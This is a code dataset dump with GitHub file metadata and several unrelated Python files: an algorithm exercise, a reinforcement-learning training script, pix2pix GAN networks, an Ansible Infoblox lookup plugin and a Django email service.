blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b332387214949ab45f1771f0aae9a5028021c655 | a81d21f98dd558416f8731f001cb8151d8309f4f | /interviewbit/interviewbit/pointers/three_sum_zero.py | cea0a17f6a40485087dbf69d9c3abc66aac3694b | [] | no_license | marquesarthur/programming_problems | 1128c38e65aade27e2435f7987d7ee2b328fda51 | 2f7df25d0d735f726b7012e4aa2417dee50526d9 | refs/heads/master | 2022-01-25T18:19:02.575634 | 2022-01-18T02:07:06 | 2022-01-18T02:07:06 | 32,213,919 | 2 | 0 | null | 2020-10-13T01:29:08 | 2015-03-14T13:44:06 | Python | UTF-8 | Python | false | false | 2,088 | py | class Solution:
def threeSum(self, A):
A = sorted(A)
n = len(A)
result = set()
for i in range(n):
j = i + 1
k = n - 1
target = A[i]
while j < k:
if target + A[j] + A[k] < 0:
j += 1
elif target + A[j] + A[k] > 0:
k -= 1
else:
result.add((A[i], A[j], A[k]))
j += 1
return sorted(list(result))
# Exceeds time limit but does the job
class MatrixSolution:
    """Alternative 3-sum solver: precompute pairwise complements, then
    binary-search for each complement. O(n^2 log n) with heavy constant
    factors (per the note above: exceeds the judge's time limit).
    """
    def binarySearch(self, A, x):
        """Return the index of ``x`` in the sorted list ``A``, or -1.

        Standard iterative binary search; ``mid`` is computed as
        begin + (end - begin) / 2 to mirror the overflow-safe C idiom.
        """
        begin = 0
        end = len(A) - 1
        while begin <= end:
            mid = int(begin + (end - begin) / 2)
            if A[mid] == x:
                return mid
            elif A[mid] > x:
                end = mid - 1
            else:
                begin = mid + 1
        return -1
    # @param A : list of integers
    # @return a list of list of integers
    def threeSum(self, A):
        """Return unique triplets of ``A`` summing to zero as tuples.

        B[i][j] holds the complement -(A[i] + A[j]); a triplet exists when
        that complement occurs in A at some third index.
        """
        A = sorted(A)
        # S keeps a full copy of the sorted input for the final index lookup.
        S = list(A)
        n = len(A)
        B = [None] * len(A)
        for i in range(len(A)):
            B[i] = [None] * n
            for j in range(i + 1, len(A)):
                k = A[i] + A[j]
                B[i][j] = -k
        result = []
        for i in range(n):
            for j in range(i + 1, n):
                x = B[i][j]
                # Search the complement among elements other than i and j.
                # NOTE(review): the comprehension target ``x`` shadows the
                # complement bound above (harmless in Py3, where comprehension
                # variables do not leak), and ``A[a] is not None`` is always
                # true for a list of ints -- both look like leftovers; verify.
                s_aux = [x for a, x in enumerate(A) if a != i and a != j and A[a] is not None]
                k = self.binarySearch(s_aux, x)
                if k != -1 and A[i] is not None and A[j] is not None:
                    # Re-search in the full list to get an index valid for S.
                    k = self.binarySearch(S, x)
                    aux = sorted([A[i], A[j], S[k]])
                    # Linear de-duplication against triplets found so far.
                    exists = False
                    for r in result:
                        if r[0] == aux[0] and r[1] == aux[1] and r[2] == aux[2]:
                            exists = True
                            break
                    if not exists:
                        result.append(aux)
        ret = [(r[0], r[1], r[2]) for r in result]
        return ret
| [
"marques.art@gmail.com"
] | marques.art@gmail.com |
6358884396388c3ab81261921c2983e5f5ede5ab | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /jSjjhzRg5MvTRPabx_10.py | 329a38580f7189f6c5c3fc07a47ac0fbdc5fc1a3 | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,966 | py |
def sentence(words):
    """Join *words* into a sentence with "a"/"an" articles.

    The first article is capitalised, every word except the last is
    lowercased, the final two items are linked with "and", and the
    sentence ends with a period. Items are joined with ", ".
    (Quirk preserved from the original: with three or more words the very
    last word keeps its original casing.)
    """
    def article(word, capitalized=False):
        # Pick the indefinite article from the word's first letter.
        art = "an" if word[0].lower() in "aeiou" else "a"
        return art.capitalize() if capitalized else art

    if len(words) == 1:
        only = words[0]
        return "{} {}.".format(article(only, True), only.lower())
    if len(words) == 2:
        first, second = words
        return "{} {} and {} {}.".format(
            article(first, True), first.lower(),
            article(second), second.lower())
    parts = []
    for index in range(len(words) - 2):
        parts.append("{} {}".format(
            article(words[index], index == 0), words[index].lower()))
    # Final pair: note words[-1] is intentionally NOT lowercased here,
    # matching the original implementation's behaviour.
    parts.append("{} {} and {} {}.".format(
        article(words[-2]), words[-2].lower(),
        article(words[-1]), words[-1]))
    return ", ".join(parts)
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
ea68d77f4f32d08fb814a0049b8bd29dfa307ca4 | 41a0220bf117124bf281a50396582c0df1e0675f | /Pyrado/scripts/evaluation/trn_argmax_policy_bayrn.py | da89629bf80d4d2cf83de3f2f6b06d59b967a485 | [
"BSD-3-Clause"
] | permissive | jacarvalho/SimuRLacra | c071dfc22d4f2c54a198405e8974d03333c9961d | a6c982862e2ab39a9f65d1c09aa59d9a8b7ac6c5 | refs/heads/master | 2022-11-24T20:08:52.376545 | 2020-08-03T09:01:35 | 2020-08-03T09:01:35 | 276,885,755 | 0 | 0 | BSD-3-Clause | 2020-07-03T11:39:21 | 2020-07-03T11:39:21 | null | UTF-8 | Python | false | false | 2,508 | py | """
Script to get the maximizer of a GP's posterior given saved data from a BayRn experiment
"""
import os.path as osp
import torch as to
from pyrado.algorithms.advantage import GAE
from pyrado.algorithms.bayrn import BayRn
from pyrado.algorithms.cem import CEM
from pyrado.algorithms.nes import NES
from pyrado.algorithms.power import PoWER
from pyrado.algorithms.ppo import PPO, PPO2
from pyrado.logger.experiment import ask_for_experiment
from pyrado.utils.argparser import get_argparser
from pyrado.utils.experiments import load_experiment
from pyrado.utils.math import UnitCubeProjector
if __name__ == '__main__':
    # Parse command line arguments
    args = get_argparser().parse_args()
    # Get the experiment's directory to load from; fall back to an
    # interactive prompt when none was given on the command line
    ex_dir = ask_for_experiment() if args.ex_dir is None else args.ex_dir
    # Load the environment and the policy
    env_sim, policy, kwout = load_experiment(ex_dir, args)
    # Load the data saved during the BayRn run (candidates and their values)
    cands = to.load(osp.join(ex_dir, 'candidates.pt'))
    cands_values = to.load(osp.join(ex_dir, 'candidates_values.pt')).unsqueeze(1)
    bounds = to.load(osp.join(ex_dir, 'bounds.pt'))
    uc_normalizer = UnitCubeProjector(bounds[0, :], bounds[1, :])
    # NOTE(review): cands, cands_values, and uc_normalizer are loaded but not
    # referenced below -- presumably needed by train_argmax_policy's side
    # effects or kept for parity with sibling scripts; verify before removing.
    # Decide on which algorithm to use via the mode argument; the actor-critic
    # methods (PPO, PPO2) additionally need a GAE critic rebuilt from the
    # saved value function and hyper-parameters
    if args.mode == PPO.name:
        critic = GAE(kwout['value_fcn'], **kwout['hparams']['critic'])
        subroutine = PPO(ex_dir, env_sim, policy, critic, **kwout['hparams']['subroutine'])
    elif args.mode == PPO2.name:
        critic = GAE(kwout['value_fcn'], **kwout['hparams']['critic'])
        subroutine = PPO2(ex_dir, env_sim, policy, critic, **kwout['hparams']['subroutine'])
    elif args.mode == CEM.name:
        subroutine = CEM(ex_dir, env_sim, policy, **kwout['hparams']['subroutine'])
    elif args.mode == NES.name:
        subroutine = NES(ex_dir, env_sim, policy, **kwout['hparams']['subroutine'])
    elif args.mode == PoWER.name:
        subroutine = PoWER(ex_dir, env_sim, policy, **kwout['hparams']['subroutine'])
    else:
        raise NotImplementedError('Only PPO, PPO2, CEM, NES, and PoWER are implemented so far.')
    # Optionally warm-start from the loaded policy/value-function parameters
    if args.warmstart:
        ppi = policy.param_values.data
        vpi = kwout['value_fcn'].param_values.data
    else:
        ppi = None
        vpi = None
    # Train the policy on the most lucrative domain
    BayRn.train_argmax_policy(ex_dir, env_sim, subroutine, num_restarts=500, num_samples=1000,
                              policy_param_init=ppi, valuefcn_param_init=vpi)
| [
"fabio.muratore@famura.net"
] | fabio.muratore@famura.net |
b967bedddcf45fcc7236e63a57d263e03a35babc | a2c0c8f20584a5d92551f18e7f6e73cfc20ab9a6 | /27.py | d7162bd765c2eecbb712bf831cd9d3b7ebc2922d | [] | no_license | subayadhav/wed05061 | 8acbd1491cd4d5d7f0eb98c62ade8879b5a8739a | 45cdb0bbe11624967178c356b31c90abf99eb412 | refs/heads/master | 2020-05-31T16:57:36.956998 | 2019-06-05T17:39:37 | 2019-06-05T17:39:37 | 190,394,471 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 69 | py | n1=input()
# Report whether the string read into n1 (above) is entirely numeric.
# Idiom fix: compare truthiness directly instead of `== True`.
if n1.isnumeric():
    print("Yes")
else:
    print("No")
| [
"noreply@github.com"
] | subayadhav.noreply@github.com |
2cb62cc18d2371aebccf0e88ffa1ecd3594ee3e2 | 6c61ad8562dd72888d1544d6176fee5eb73d1e15 | /pix2pix/networks.py | 8ea028ed60acb2374b59227449788659ab54c3ee | [
"MIT"
] | permissive | kendricktan/rarepepes | 7b744ff483d00163ace541577da51b30eb1191dc | c6e7525cba4c3e3ff9f7de8e97a02b3f3450b898 | refs/heads/master | 2021-06-06T11:24:10.206399 | 2017-05-26T02:09:18 | 2017-05-26T02:09:18 | 90,793,293 | 24 | 4 | MIT | 2021-04-02T15:51:43 | 2017-05-09T21:25:10 | Python | UTF-8 | Python | false | false | 9,328 | py | import torch
import torch.nn as nn
from torch.autograd import Variable
import numpy as np
###############################################################################
# Functions
###############################################################################
def weights_init(m):
    """DCGAN-style initializer, applied via ``net.apply(weights_init)``.

    Conv-type layers get weights ~ N(0, 0.02); BatchNorm2d/InstanceNorm2d
    layers get weights ~ N(1, 0.02) and zero bias. Every other module is
    left untouched.
    """
    layer_name = type(m).__name__
    if 'Conv' in layer_name:
        m.weight.data.normal_(0.0, 0.02)
    elif 'BatchNorm2d' in layer_name or 'InstanceNorm2d' in layer_name:
        # NOTE(review): assumes the norm layer was built with affine=True,
        # otherwise .weight/.bias are None -- holds for this file, which
        # always passes affine=True.
        m.weight.data.normal_(1.0, 0.02)
        m.bias.data.fill_(0)
def get_norm_layer(norm_type):
    """Map a normalization name to the corresponding ``torch.nn`` class.

    Args:
        norm_type: Either ``'batch'`` or ``'instance'``.

    Returns:
        ``nn.BatchNorm2d`` or ``nn.InstanceNorm2d`` (the class, not an
        instance).

    Raises:
        NotImplementedError: For an unknown ``norm_type``. (Bug fix: the
            original printed a message referencing the still-unassigned
            ``norm_layer`` variable and then returned it, which raised
            UnboundLocalError instead of a useful error.)
    """
    if norm_type == 'batch':
        norm_layer = nn.BatchNorm2d
    elif norm_type == 'instance':
        norm_layer = nn.InstanceNorm2d
    else:
        raise NotImplementedError('normalization layer [%s] is not found' % norm_type)
    return norm_layer
def define_G(input_nc, output_nc, ngf, norm='batch', use_dropout=False, gpu_ids=[]):
    """Construct, initialize, and return a U-Net generator.

    Args:
        input_nc: Number of input channels.
        output_nc: Number of output channels (UnetGenerator asserts it
            equals input_nc).
        ngf: Number of filters in the outermost layer.
        norm: 'batch' or 'instance', resolved via get_norm_layer.
        use_dropout: Enable dropout inside the intermediate U-Net blocks.
        gpu_ids: GPU ids; when non-empty the model is moved to gpu_ids[0].
            NOTE(review): mutable default argument -- harmless here since it
            is never mutated, but worth confirming.

    Returns:
        The UnetGenerator with DCGAN-style initialized weights.
    """
    netG = None
    use_gpu = len(gpu_ids) > 0
    norm_layer = get_norm_layer(norm_type=norm)
    if use_gpu:
        assert(torch.cuda.is_available())
    # num_downs=8: per the UnetGenerator note, num_downs==7 maps 128x128 to
    # 1x1 at the bottleneck, so 8 corresponds to 256x256 inputs.
    netG = UnetGenerator(input_nc, output_nc, 8, ngf,
                         norm_layer=norm_layer, use_dropout=use_dropout, gpu_ids=gpu_ids)
    if len(gpu_ids) > 0:
        # NOTE(review): .cuda(device_id=...) is the legacy PyTorch keyword;
        # modern releases expect .cuda(device=...) -- confirm the torch
        # version this repo targets.
        netG.cuda(device_id=gpu_ids[0])
    netG.apply(weights_init)
    return netG
def define_D(input_nc, ndf, n_layers_D=3, norm='batch', use_sigmoid=False, gpu_ids=[]):
    """Construct, initialize, and return a PatchGAN discriminator.

    Args:
        input_nc: Number of input channels.
        ndf: Number of filters in the first conv layer.
        n_layers_D: Number of intermediate conv layers.
        norm: 'batch' or 'instance', resolved via get_norm_layer.
        use_sigmoid: Append a Sigmoid output (for the vanilla GAN loss).
        gpu_ids: GPU ids; when non-empty the model is moved to gpu_ids[0].

    Returns:
        The NLayerDiscriminator with DCGAN-style initialized weights.
    """
    netD = None
    use_gpu = len(gpu_ids) > 0
    norm_layer = get_norm_layer(norm_type=norm)
    if use_gpu:
        assert(torch.cuda.is_available())
    # Bug fix: n_layers was hard-coded to 3, silently ignoring the
    # n_layers_D argument. Default behavior (n_layers_D=3) is unchanged.
    netD = NLayerDiscriminator(
        input_nc, ndf, n_layers=n_layers_D, norm_layer=norm_layer, use_sigmoid=use_sigmoid, gpu_ids=gpu_ids)
    if use_gpu:
        # NOTE(review): legacy .cuda(device_id=...) keyword, see define_G.
        netD.cuda(device_id=gpu_ids[0])
    netD.apply(weights_init)
    return netD
def print_network(net):
    """Print a module's architecture followed by its total parameter count."""
    total = sum(param.numel() for param in net.parameters())
    print(net)
    print('Total number of parameters: %d' % total)
##############################################################################
# Classes
##############################################################################
# Defines the GAN loss which uses either LSGAN or the regular GAN.
# When LSGAN is used, it is basically same as MSELoss,
# but it abstracts away the need to create the target label tensor
# that has the same size as the input
class GANLoss(nn.Module):
    """GAN objective that hides the target-tensor bookkeeping.

    With ``use_lsgan=True`` this is an MSE loss (LSGAN), otherwise a BCE
    loss (vanilla GAN). The real/fake target tensors are created lazily,
    filled with ``target_real_label``/``target_fake_label``, and cached;
    a cached target is reused as long as the prediction's element count
    matches, and rebuilt otherwise.
    """
    def __init__(self, use_lsgan=True, target_real_label=1.0, target_fake_label=0.0,
                 tensor=torch.FloatTensor):
        super(GANLoss, self).__init__()
        self.real_label = target_real_label
        self.fake_label = target_fake_label
        # Cached target tensors, (re)built on demand in get_target_tensor.
        self.real_label_var = None
        self.fake_label_var = None
        # Tensor factory, injectable so callers can pick e.g. a CUDA tensor.
        self.Tensor = tensor
        self.loss = nn.MSELoss() if use_lsgan else nn.BCELoss()
    def get_target_tensor(self, input, target_is_real):
        """Return a constant target tensor shaped like ``input``."""
        if target_is_real:
            cached = self.real_label_var
            if cached is None or cached.numel() != input.numel():
                filled = self.Tensor(input.size()).fill_(self.real_label)
                self.real_label_var = Variable(filled, requires_grad=False)
            return self.real_label_var
        cached = self.fake_label_var
        if cached is None or cached.numel() != input.numel():
            filled = self.Tensor(input.size()).fill_(self.fake_label)
            self.fake_label_var = Variable(filled, requires_grad=False)
        return self.fake_label_var
    def __call__(self, input, target_is_real):
        """Compute the loss between ``input`` and the matching target."""
        target_tensor = self.get_target_tensor(input, target_is_real)
        return self.loss(input, target_tensor)
# Defines the Unet generator.
# |num_downs|: number of downsamplings in UNet. For example,
# if |num_downs| == 7, image of size 128x128 will become of size 1x1
# at the bottleneck
class UnetGenerator(nn.Module):
    """U-Net generator assembled from nested UnetSkipConnectionBlocks.

    ``num_downs`` is the number of 2x downsamplings; per the note above,
    num_downs == 7 reduces a 128x128 image to 1x1 at the bottleneck.
    """
    def __init__(self, input_nc, output_nc, num_downs, ngf=64,
                 norm_layer=nn.BatchNorm2d, use_dropout=False, gpu_ids=[]):
        super(UnetGenerator, self).__init__()
        self.gpu_ids = gpu_ids
        # currently support only input_nc == output_nc
        assert(input_nc == output_nc)
        # construct unet structure from the inside out: start with the
        # innermost (bottleneck) block, then repeatedly wrap it
        unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, innermost=True)
        # (num_downs - 5) middle blocks at the widest ngf*8 resolution;
        # dropout (if any) is applied only in these
        for i in range(num_downs - 5):
            unet_block = UnetSkipConnectionBlock(
                ngf * 8, ngf * 8, unet_block, norm_layer=norm_layer, use_dropout=use_dropout)
        # four outer blocks progressively halving the channel count
        unet_block = UnetSkipConnectionBlock(
            ngf * 4, ngf * 8, unet_block, norm_layer=norm_layer)
        unet_block = UnetSkipConnectionBlock(
            ngf * 2, ngf * 4, unet_block, norm_layer=norm_layer)
        unet_block = UnetSkipConnectionBlock(
            ngf, ngf * 2, unet_block, norm_layer=norm_layer)
        unet_block = UnetSkipConnectionBlock(
            output_nc, ngf, unet_block, outermost=True, norm_layer=norm_layer)
        self.model = unet_block
    def forward(self, input):
        # Split the batch across GPUs only for CUDA float inputs;
        # otherwise run the plain forward pass.
        if self.gpu_ids and isinstance(input.data, torch.cuda.FloatTensor):
            return nn.parallel.data_parallel(self.model, input, self.gpu_ids)
        else:
            return self.model(input)
# Defines the submodule with skip connection.
# X -------------------identity---------------------- X
# |-- downsampling -- |submodule| -- upsampling --|
class UnetSkipConnectionBlock(nn.Module):
    """One U-Net level: downsample, run the nested submodule, upsample,
    and (except at the outermost level) concatenate the input back on as
    a skip connection (see the X --identity-- X diagram above).
    """
    def __init__(self, outer_nc, inner_nc,
                 submodule=None, outermost=False, innermost=False, norm_layer=nn.BatchNorm2d, use_dropout=False):
        super(UnetSkipConnectionBlock, self).__init__()
        self.outermost = outermost
        # 4x4 stride-2 conv: halves the spatial size on the way down
        downconv = nn.Conv2d(outer_nc, inner_nc, kernel_size=4,
                             stride=2, padding=1)
        downrelu = nn.LeakyReLU(0.2, True)
        downnorm = norm_layer(inner_nc, affine=True)
        uprelu = nn.ReLU(True)
        upnorm = norm_layer(outer_nc, affine=True)
        if outermost:
            # Outermost: no skip concat, Tanh output, no norm on either side.
            # The up-conv takes inner_nc * 2 channels because the submodule's
            # output carries its own skip concatenation.
            upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,
                                        kernel_size=4, stride=2,
                                        padding=1)
            down = [downconv]
            up = [uprelu, upconv, nn.Tanh()]
            model = down + [submodule] + up
        elif innermost:
            # Innermost (bottleneck): no submodule, so the up-conv input is
            # just inner_nc (nothing was concatenated below this level).
            upconv = nn.ConvTranspose2d(inner_nc, outer_nc,
                                        kernel_size=4, stride=2,
                                        padding=1)
            down = [downrelu, downconv]
            up = [uprelu, upconv, upnorm]
            model = down + up
        else:
            # Middle level: norm on both paths, optional dropout at the end.
            upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,
                                        kernel_size=4, stride=2,
                                        padding=1)
            down = [downrelu, downconv, downnorm]
            up = [uprelu, upconv, upnorm]
            if use_dropout:
                model = down + [submodule] + up + [nn.Dropout(0.5)]
            else:
                model = down + [submodule] + up
        self.model = nn.Sequential(*model)
    def forward(self, x):
        if self.outermost:
            return self.model(x)
        else:
            # Skip connection: concatenate input and output along channels.
            return torch.cat([self.model(x), x], 1)
# Defines the PatchGAN discriminator with the specified arguments.
class NLayerDiscriminator(nn.Module):
    """PatchGAN discriminator: a stack of strided 4x4 convs whose channel
    count doubles per layer (capped at ndf*8), ending in a 1-channel map
    of per-patch real/fake scores.
    """
    def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d, use_sigmoid=False, gpu_ids=[]):
        super(NLayerDiscriminator, self).__init__()
        self.gpu_ids = gpu_ids
        kw = 4
        # NOTE(review): ceil((4 - 1) / 2) == 2 under Python 3 true division
        # but 1 under Python 2 floor division, so the padding (and output
        # patch size) differs between interpreters -- confirm the intended
        # target version.
        padw = int(np.ceil((kw - 1) / 2))
        # First layer: conv + LeakyReLU, no normalization
        sequence = [
            nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw),
            nn.LeakyReLU(0.2, True)
        ]
        # Intermediate stride-2 layers, doubling channels up to a factor of 8
        nf_mult = 1
        nf_mult_prev = 1
        for n in range(1, n_layers):
            nf_mult_prev = nf_mult
            nf_mult = min(2**n, 8)
            sequence += [
                nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,
                          kernel_size=kw, stride=2, padding=padw),
                # TODO: use InstanceNorm
                norm_layer(ndf * nf_mult, affine=True),
                nn.LeakyReLU(0.2, True)
            ]
        # One more stride-1 layer before the final projection
        nf_mult_prev = nf_mult
        nf_mult = min(2**n_layers, 8)
        sequence += [
            nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,
                      kernel_size=kw, stride=1, padding=padw),
            # TODO: useInstanceNorm
            norm_layer(ndf * nf_mult, affine=True),
            nn.LeakyReLU(0.2, True)
        ]
        # Project down to a single-channel patch score map
        sequence += [nn.Conv2d(ndf * nf_mult, 1,
                               kernel_size=kw, stride=1, padding=padw)]
        if use_sigmoid:
            sequence += [nn.Sigmoid()]
        self.model = nn.Sequential(*sequence)
    def forward(self, x):
        # Multi-GPU data parallelism only for CUDA float inputs
        if len(self.gpu_ids) and isinstance(x.data, torch.cuda.FloatTensor):
            return nn.parallel.data_parallel(self.model, x, self.gpu_ids)
        else:
            return self.model(x)
| [
"kendricktan0814@gmail.com"
] | kendricktan0814@gmail.com |
25c89576f82e9202346193c01764c1a192c9cbfd | 2825bf6479e08dfead428ff9f29f28d5c23d953e | /26_2/26_7.py | e9fd86e7707b27199667321125bfa3feba2697cc | [] | no_license | zedaster/ImaevIntensive | bc459187dace7946d8ad75a04e058748134aeac4 | b91760fa23f25ce2d19778781f35416c177ab881 | refs/heads/main | 2023-06-22T00:24:47.039208 | 2021-07-20T10:40:54 | 2021-07-20T10:40:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 248 | py | file = open('26-j2.txt')
# Skip the first line of the input file (a header; the file object `file`
# is opened above) and sort the remaining integer samples.
values = sorted(map(int, file.readlines()[1:]))
# Upper median of the sorted sample: index n//2 picks the larger of the two
# middle elements when the length is even.
medium = values[len(values)//2]
avg = sum(values)/len(values)
count = 0
# Count samples lying between the median and the arithmetic mean, inclusive;
# min/max handle either ordering of the two bounds.
for val in values:
    if min(medium, avg) <= val <= max(medium, avg):
        count += 1
print(count)
"serzh.kazantseff@gmail.com"
] | serzh.kazantseff@gmail.com |
fe0efe683946a1b5e9c30a52b867324f374e121c | eacff46eda2c6b509449979a16002b96d4645d8e | /Collections-a-installer/community-general-2.4.0/plugins/lookup/nios_next_ip.py | 5b979b8d075f498a8eacf83c572686b3d3b13f96 | [
"MIT",
"GPL-3.0-only",
"GPL-3.0-or-later"
] | permissive | d-amien-b/simple-getwordpress | 5e6d4d15d5f87124ab591e46b63fec552998fdc3 | da90d515a0aa837b633d50db4d91d22b031c04a2 | refs/heads/master | 2023-04-08T22:13:37.347545 | 2021-04-06T09:25:51 | 2021-04-06T09:25:51 | 351,698,069 | 0 | 0 | MIT | 2021-03-31T16:16:45 | 2021-03-26T07:30:00 | HTML | UTF-8 | Python | false | false | 3,580 | py | #
# Copyright 2018 Red Hat | Ansible
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = '''
---
author: Unknown (!UNKNOWN)
name: nios_next_ip
short_description: Return the next available IP address for a network
description:
- Uses the Infoblox WAPI API to return the next available IP addresses
for a given network CIDR
requirements:
- infoblox-client
extends_documentation_fragment:
- community.general.nios
options:
_terms:
description: The CIDR network to retrieve the next addresses from
required: True
num:
description: The number of IP addresses to return
required: false
default: 1
exclude:
description: List of IP's that need to be excluded from returned IP addresses
required: false
'''
EXAMPLES = """
- name: return next available IP address for network 192.168.10.0/24
ansible.builtin.set_fact:
ipaddr: "{{ lookup('community.general.nios_next_ip', '192.168.10.0/24', provider={'host': 'nios01', 'username': 'admin', 'password': 'password'}) }}"
- name: return the next 3 available IP addresses for network 192.168.10.0/24
ansible.builtin.set_fact:
ipaddr: "{{ lookup('community.general.nios_next_ip', '192.168.10.0/24', num=3, provider={'host': 'nios01', 'username': 'admin', 'password': 'password'}) }}"
- name: return the next 3 available IP addresses for network 192.168.10.0/24 excluding ip addresses - ['192.168.10.1', '192.168.10.2']
ansible.builtin.set_fact:
ipaddr: "{{ lookup('community.general.nios_next_ip', '192.168.10.0/24', num=3, exclude=['192.168.10.1', '192.168.10.2'],
provider={'host': 'nios01', 'username': 'admin', 'password': 'password'}) }}"
"""
RETURN = """
_list:
description:
- The list of next IP addresses available
type: list
"""
from ansible.plugins.lookup import LookupBase
from ansible_collections.community.general.plugins.module_utils.net_tools.nios.api import WapiLookup
from ansible.module_utils._text import to_text
from ansible.errors import AnsibleError
class LookupModule(LookupBase):
    """Ansible lookup returning the next available IPs of an Infoblox network.

    The first term is the network CIDR; ``num`` and ``exclude`` kwargs are
    forwarded to the WAPI ``next_available_ip`` function.
    """
    def run(self, terms, variables=None, **kwargs):
        try:
            cidr = terms[0]
        except IndexError:
            raise AnsibleError('missing argument in the form of A.B.C.D/E')
        provider = kwargs.pop('provider', {})
        wapi = WapiLookup(provider)
        # Resolve the CIDR to a WAPI network object
        matches = wapi.get_object('network', {'network': cidr})
        if matches is None:
            raise AnsibleError('unable to find network object %s' % cidr)
        requested = kwargs.get('num', 1)
        excluded = kwargs.get('exclude', [])
        try:
            network_ref = matches[0]['_ref']
            reply = wapi.call_func('next_available_ip', network_ref,
                                   {'num': requested, 'exclude': excluded})
            return [reply['ips']]
        except Exception as exc:
            # Surface any WAPI/parsing failure as a readable Ansible error
            raise AnsibleError(to_text(exc))
| [
"test@burdo.fr"
] | test@burdo.fr |
58178854f14d7de01b5a58abeb950b2d4c6fe2db | 6a61667e176b06ccdef07e84d79b382b2fb491bb | /common/services/email_service.py | 6b2cc57cdf6fc6d96376703f32b4245ec18d1103 | [] | no_license | vsokoltsov/Interview360Server | 333f08f13b33ef88928b3e4b844f60e72ebec809 | 252b0ebd77eefbcc945a0efc3068cc3421f46d5f | refs/heads/master | 2022-12-11T05:38:01.310133 | 2019-03-24T17:47:09 | 2019-03-24T17:47:09 | 95,320,167 | 2 | 3 | null | 2022-12-08T04:54:08 | 2017-06-24T20:09:08 | Python | UTF-8 | Python | false | false | 2,742 | py | from django.core.mail import send_mail
from django.template.loader import render_to_string
from django.core.mail import EmailMultiAlternatives
import os
import ipdb
class EmailService:
    """Sends the application's transactional emails.

    Each public helper renders a Django template into a message body and
    delivers it through ``django.core.mail.send_mail`` from ``SENDER``.
    """
    SENDER = 'Anymail Sender <from@example.com>'
    @classmethod
    def send_interview_reminder(cls, user, vacancy, interview):
        """Remind *user* about an upcoming interview."""
        body = render_to_string('interview_reminder.html', {
            'vacancy': vacancy,
            'interview': interview
        })
        cls._send_default_mail('Upcoming interview notification', body, [user])
    @classmethod
    def send_interview_invintation(cls, users, vacancy, interview):
        """Invite *users* to an interview for *vacancy*."""
        body = render_to_string('interview_invitation.html', {
            'vacancy': vacancy,
            'interview': interview
        })
        cls._send_default_mail('Interview invintation', body, users)
    @classmethod
    def sent_personal_employee_invite(cls, user, token, company):
        """Email *user* an invitation (carrying *token*) to join *company*.

        NOTE(review): the "sent" in the method name looks like a typo for
        "send", but it is kept because callers depend on it.
        """
        invite_url = '{}/auth/invite'.format(
            os.environ['DEFAULT_CLIENT_HOST']
        )
        body = render_to_string('company_invite.html', {
            'company': company,
            'link_url': invite_url,
            'token': token}
        )
        cls._send_default_mail("Company invite mail", body, [user])
    @classmethod
    def send_reset_password_mail(cls, user, token):
        """Email *user* a password-reset link carrying *token*."""
        reset_url = '{}/auth/reset-password'.format(
            os.environ['DEFAULT_CLIENT_HOST'])
        body = render_to_string('reset_password.html', {
            'reset_link_url': reset_url,
            'token': token}
        )
        cls._send_default_mail('Reset password', body, [user])
    @classmethod
    def send_company_invite_confirmation(cls, user, company):
        """Confirm to *user* that the invite into *company* was accepted."""
        company_url = '{}/companies/{}/'.format(
            os.environ['DEFAULT_CLIENT_HOST'], company.id
        )
        body = render_to_string('company_invite_final.html', {
            'link_url': company_url,
            'user': user,
            'company': company
        })
        cls._send_default_mail('Invite confirmation', body, [user])
    @classmethod
    def _send_default_mail(cls, topic, message, mails):
        """Deliver *message* with subject *topic* from SENDER to *mails*."""
        send_mail(topic, message, cls.SENDER, mails)
| [
"vforvad@gmail.com"
] | vforvad@gmail.com |
